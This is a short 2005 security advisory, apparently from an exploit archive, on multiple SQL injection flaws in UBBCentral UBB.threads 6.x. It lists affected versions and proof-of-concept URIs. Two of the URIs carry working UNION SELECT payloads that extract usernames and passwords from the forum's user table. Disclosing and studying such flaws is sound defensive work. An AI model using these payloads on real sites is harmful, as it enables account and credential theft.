exploits , vulnerabilities , articles , UBBCentral UBB.Threads Multiple SQL Injection Vulnerabilities
| Title |
UBBCentral UBB.Threads Multiple SQL Injection Vulnerabilities |
| Published |
2005-06-24-12:00AM |
| Updated |
2005-06-24-04:46PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
James Bercegay of the GulfTech Security Research Team is credited with the discovery of this vulnerability. |
| Vulnerable |
UBBCentral UBB.threads 6.5.1 .1
UBBCentral UBB.threads 6.5.1
UBBCentral UBB.threads 6.5
UBBCentral UBB.threads 6.2.3
UBBCentral UBB.threads 6.0 |
| Not Vulnerable |
UBBCentral UBB.threads 6.5.2 Beta2 |
| Code |
No exploit is required.
The following proof of concept URI are available:
http://www.example.com/ubbt/download.php?Number=42227[SQL]
http://www.example.com/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
http://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
http://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post
http://www.example.com/ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat
http://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received
http://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat
http://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
http://www.example.com/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]
|
| TXT |
 |
|
Advertising
|
